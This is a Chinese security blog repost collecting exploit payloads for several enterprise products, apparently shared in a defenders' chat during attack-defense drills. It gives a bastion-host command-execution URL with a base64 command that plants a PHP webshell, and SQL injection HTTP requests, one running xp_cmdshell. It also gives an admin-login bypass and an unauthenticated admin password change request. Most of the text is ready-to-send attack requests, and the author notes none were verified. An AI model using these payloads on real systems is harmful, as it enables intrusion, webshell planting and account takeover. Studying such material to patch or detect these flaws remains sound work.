攻防演练平安夜:漏洞Payload – 作者:alexo0

下午一觉醒来,发现某蓝队群里正在讨论关于几个厂商的安全漏洞,也分享到群了。

0、齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)

未授权无需登录。

1、访问 http://10.20.10.11/listener/cluster_manage.php  :返回 “OK”.

2、访问如下链接即可getshell,执行成功后,生成PHP一句话马

3、/var/www/shterm/resources/qrcode/lbj77.php  密码10086

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

1600053284.png!small

这里假设10.20.10.10为堡垒机的IP地址。

1、天融信TopApp-LB 负载均衡系统Sql注入漏洞

1600053312.png!small

POST /acc/clsf/report/datasource.php HTTP/1.1Host: localhostConnection: closeAccept: text/javascript, text/html, application/xml, text/xml, */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedt=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

网友称以下两个历史漏洞仍然可以复现。

https://www.uedbox.com/post/21626/

https://www.uedbox.com/post/22193/

2、用友GRP-u8 注入

1600053363.png!small

POST /Proxy HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: localhostContent-Length: 341Connection: Keep-AliveCache-Control: no-cachecVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

3、绿盟UTS综合威胁探针管理员任意登录

逻辑漏洞,利用方式参考(https://www.hackbug.net/archives/112.html)

1、修改登录数据包 {“status”:false,”mag”:””} -> {“status”:true,”mag”:””}

2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码(md5)

3、再次登录,替换密码上个数据包中md5密码。

4、登录成功。

1600053418.png!small

4、天融信数据防泄漏系统越权修改管理员密码

无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。

POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

1600053450.png!small

5、WPS Office 图片解析错误导致堆损坏,任意代码执行。

看上去(算了看不懂… ,漏洞利用可能导致拒绝服务。

相关参考:

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

以上内容均为网友分享,作者并未实际复现。

本文转载自公众号:渗了个透

作者:杨萧然

来源:freebuf.com 2020-09-14 11:22:32 by: alexo0

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论